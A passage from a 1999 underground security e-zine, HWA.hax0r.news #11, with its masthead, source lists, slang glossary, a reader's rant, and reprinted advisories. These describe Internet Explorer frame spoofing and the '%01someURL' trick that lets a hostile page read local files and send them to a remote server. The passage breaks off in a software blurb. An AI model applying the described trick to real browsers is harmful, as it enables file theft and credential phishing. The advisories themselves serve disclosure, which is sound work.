[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 11 Volume 1 1999 March 24th 99 ========================================================================== Anyone want to send in comments on the current site or ideas for a new site layout, please do so, i'm no html wizard and all my sites tend to end up looking pretty much the same, if you feel creative and want to put a demo site together or point me in the direction of a site layout you like please do so, i'm getting bored with the haphazard layout of the current site and could use some creative input on ideas for layout as its a bit crowded currently and only looks half decent in 1024x768 mode .... tnx - cruciphux@dok.org Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #11 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #wierdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #11 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the editor.................................................. =--------------------------------------------------------------------------= 03.0 .. MSIE 5 is still susceptible to frame spoofing and other bugs..... 03.1 .. MSIE 5 problems carried over from earlier versions.............. 04.0 .. WintrasherGOLD................................................... 05.0 .. LDAP Buffer overflow............................................. 06.0 .. HP security bulletin: HPTerm exploit............................. 07.0 .. Eudora buffer overflow exploit................................... 08.0 .. Netscape SUSE crash exploit...................................... 09.0 .. Hotmail to fix potential security problem ....................... 10.0 .. NcFTPd Exploit (from Feb but missed in earlier issues)........... 10.1 .. NcFTPd proxy exploitation....................................... 10.2 .. Mail.local sendmail exploit advisory............................ 11.0 .. Its in the bag, much ado about nothing .......................... 12.0 .. [ISN] DNS Spoofing finally resolved?............................. 13.0 .. [ISN] IETF working group seeks to improve security alerting .... 14.0 .. Report: Military computers vulnerable............................ 15.0 .. International raid cracks child porn ring ....................... 15.1 .. ACPM : Anti-Child Porn Militia wants YOU........................ 16.0 .. Hacking (Cracking) contest, win a Netfinity server!.............. 17.0 .. eBay owned....................................................... 18.0 .. Aussies to ban Net pr0n.......................................... 19.0 .. More on the ProMail email trojan program ........................ 20.0 .. C41 - Pentagon’s cyberdefenses criticized........................ 21.0 .. [ISN] NetBus 'Trojan' Splits Security Community.................. 22.0 .. [ISN] Cracking tools get smarter ................................ 23.0 .. [ISN] British Defense Ministry Dismisses Hacker Report........... 24.0 .. [ISN] Encryption key would lock up criminals..................... 25.0 .. [ISN] Crypto: Under lock and key ................................ 26.0 .. HRC's interview with Goat Security (IRC LOG)..................... 27.0 .. Year 2000 Network and Distributed System Security ............... 28.0 .. What would YOU do with Bill Gates' SSN?.......................... 29.0 .. MDT monitoring (Mobile Data Terminal as used by the Police)...... 30.0 .. Bugtraq: Lotus notes security advisory........................... 31.1 .. WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)....... 32.0 .. Bugtraq: OpenSSL and SSLeay Advisory............................. 33.0 .. OpenBSD security advisories...................................... 34.0 .. Oracle in insecure at initial install............................ 35.0 .. GnuPlot buffer overflow exploit ................................. =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. .......................................................................... HA.HA .. Humour and puzzles ............................................ HA.HA1 .. Humourous newsbytes from Innerpulse.com (www.innerpulse.com). .......................................................................... HOW.TO .. New section: "How to hack" by our illustrious editor part 2..... SITE.1 .. Featured site, http://www.real-secure.org/ with ezine excerpt... on IP Spoofing ................................................. .......................................................................... H.W .. Hacked Websites .............................................. A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 "Heh heh heh heh heh,.why don't you listen to this recording with interest? Mary Mary, kill the hairy sonuvabitch...he he he and now for something completely different" - Wierdmix'90 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? - unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+........................http://www.gammaforce.org/ News site+........................http://www.projectgamma.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Can I see you naked?" - Bob Barker Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * tsal * spikeman * YOU. * #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Attrition has updated its archive of cracked sites with one of the biggest archives on the net http://www.attrition.org check it out ... Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yes we really do get a pile of mail in case you were wondering ;-0 heres a sampling of some of the mail we get here, the more interesting ones are included and of course we had to get in the plugs for the zine coz we love to receive those too *G* - Ed This is "off-topic" but its something I thought i'd share with the readers if you have any comments on the writing i'd like to hear them and so would phiregod so give us an email, we need more writers like this to bring a dose of reality to our lives now and then... - Cruciphux@dok.org From: "liquid phire" To: cruciphux@dok.org Subject: a new one Date: Tue, 23 Mar 1999 19:04:34 PST Mime-Version: 1.0 Content-type: text/plain when i watch tv all i see are commercials for heartburn stuffs, what is with that? are the subjects of american culture rotting from the inside out? did their bodies realize their sins before their minds did? is this happening with everyone? the world is going downhill fast, and we wont find out until we hit the bottom whether or not our air bags will work. this is a new car commercial, gaudy and loud, "buy or die!" they scream from their tabloid pulpits. our churches have turned into department stores, the very children that are our hope are selling their lives out for a dime bag and a place to stay. we dress in jail rags, chant the rants of the very people that are bringing this psuedo-life to its knees. athletes are yelling the rhymes of corporations at anyone who will listen. our heros are not fighting for equality or freedom, they are throwing hype out about cop killers and hits of coke. you cant eat money, you cant take it with you when you die, and it sure as hell wont stop a bullet. america is the prostitute of the free and imprisoned world, thousands died so we can enjoy cable from our matching houses with our matching lives. god is for those who are wasting their lives and need another one to spare. we fought for what now? so that rapists and murderers could walk free while political prisoners rotted in their cells? parents work all day so their children can attend public schools that promote insecurity and train the next generation to be faceless and money driven. the smart are encouraged to work for large companies or military services, the down of luck are pushed into low paying jobs and inferior lives. the country will prosper and a revolution will be breathing down our necks. i missed the sermon with the explanation, the end is near and the lord saves. mc donalds will cater the apocalypse, and nike will provide the offical shoe. god sold out to miramax for the film, tarantino has claimed the screenplay, and look out for the soundtrack by backstreet boys. salvation is being sold with an order of fries, healing comes with a free drink, faith by armani. the angels have encountered a glass ceiling, sexual harassment allegations in hell, the government has become "nightly action news". blood and gore, right and wrong, good and bad, pleasure and pain extremes are desired in a moderated world. the second coming will have its own line of clothes, the blood of the lamb is copyrighted. heaven and the inferno have merged and the NASDAQ is reaching all time highs. justice has been fucked over, her sword carried off and her measures used for heroin. the flag is used as a doormat in other countries, our anthem sung by drunk veterans in the middle of the night. this feels like a moment of revelation, but its just another day in Las Vegas. i wake up in the middle of the night screaming for solace, i cry for a calm sea and a worthy ship. like a panther truth runs through the sleeping city, merging with the gray and spreading over the streets in lies. we are grasping ever bit of cabbie wisdom we can find, slipping over the edge trying to hold on to religion, government, and "family". we have a thirst that encompasses our lives, and it can only be quenched with blood. "i am the alpha and the omega, the begining and the end." i dont remember if it was jesus or bill gates that said that. please excuse all grammer/spelling mistakes. phiregod liquidphire@hotmail.com www.geocities.com/siliconvalley/sector/4121 Get Your Private, Free Email at http://www.hotmail.com ================================================================ @HWA 02.0 From the editor.#9 ~~~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *So Mircosoft continues to suck, the released IE5 (wooHOO) *and whaddya know it still has a slew of bugs duh...all those *frame spewfing bugs and other java monsters are still in there *so I hope u guys that keep hitting the site with MSIE will *begin to smarten up and see that Netscape although not the *most secure program either is a damn sight better than MSIE *even on a bad day ... peace out rockin with issue 11 * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 MSIE 5 is still susceptible to frame spoofing and other bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 19 Mar 1999 11:46:01 +0100 From: Most Psychoid To: BUGTRAQ@netspace.org Subject: IE5 - same vulnerabilities, only some fixed Hello, The new Microsoft Internet Explorer 5 (I checked Version: 5.00.0910.1309) still allows Frame Spoofing and reading of local Files as described by Georgi Guninski (see http://www.whitehats.com/guninski/read.html). Another new feature named "AutoComplete" stores entries (which also may be passwords). Just another new source for passwords which had not been saved in IE 4.x. The Crash-bugs seem to be removed. I could not crash my default installed IE 5 using the known exploits. So far, psychoid --- Sent through Global Message Exchange - http://www.gmx.net 03.1 MSIE 5 problems carried over from earlier versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There is a Javascript security bug in Internet Explorer 4.x (patched), which circumvents "Cross-frame security" and opens several security holes. The problem is: if you add '%01someURL' after an 'about:somecode' URL, IE thinks that the document is loaded from the domain of 'someURL'. Very strange? Some of the bugs are: 1) IE allows reading local files and sending them to an arbitrary server. The filename must be known. The bug may be exploited using HTML mail message. Demo is available (See Demos below) 2) IE allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. Demo is available (See below) 3) Reading AUTOEXEC.BAT using TDC. Demo is available: (See below) Workaround: Disable Javascript Demo #1 Guninski's IE 4 file reading bug. There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.
The filename must be known.
The bug may be exploited using HTML mail message. The exploit uses Javascript. For more info see the source.
Workaround: Disable Javascript.
Go to Georgi Guninski's home page. Demo #2 Guninski's IE 4 window spoofing. There is a bug in Internet Explorer 4.x (patched) which allows "window spoofing".
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.

After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is mislead he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number.
The bug may be exploited using HTML mail message. The exploit uses Javascript.
Workaround: Disable Javascript.
Go to Georgi Guninski's home page. Demo #3 Guninski's IE 4 reading AUTOEXEC.BAT. There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
The problem is: if you add '%01someURL' after the an about: URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.
This will try to read C:\AUTOEXEC.BAT using TDC.
The bug may be exploited using HTML mail message. The exploit uses Javascript. For more info see the source.

Workaround: Disable Javascript.
Go to Georgi Guninski's home page. This was reported in an earlier version and last issue of the zine but is included here for new readers whom may be unaware or have not read the earlier issues. - Ed 04.0 Wintrasher GOLD ~~~~~~~~~~~~~~~ This program bears some looking at, when I first saw it on packetstorm I thought the same thing i thought when I first heard of Genius's release and thats pure scepticism, anyways I checked it out and its pretty damn cool you might want to check it out too, 1.6M heres the blurb from packetstorm: Wintrasher GOLD v5.2 - Wintrasher is a powerful utility that can be ussed to configure hidden Windows settings, acting as a Windows Shell and Desktop Management Tool. Many of the settings that change the way Windows works and looks are hidden in the overwhelming registry, or in configuration files. WT-GOLD gives you an easy way to configure those settings. This version also includes, backup of critical system files, improved active desktop-calendar, popup-reminder, and much much more. Features: Get you computer to start in pure DOS again. Change the shortcut arrow to whatever you want. Check your files for changes at startup, and prevent infection by unknown viruses. Log file editor, to View/Edit/Clear all your Windows log files from one program. (improved from the PRO version). Personalize your Desktop pictures. Change the Windows 9x folder structure. Watch 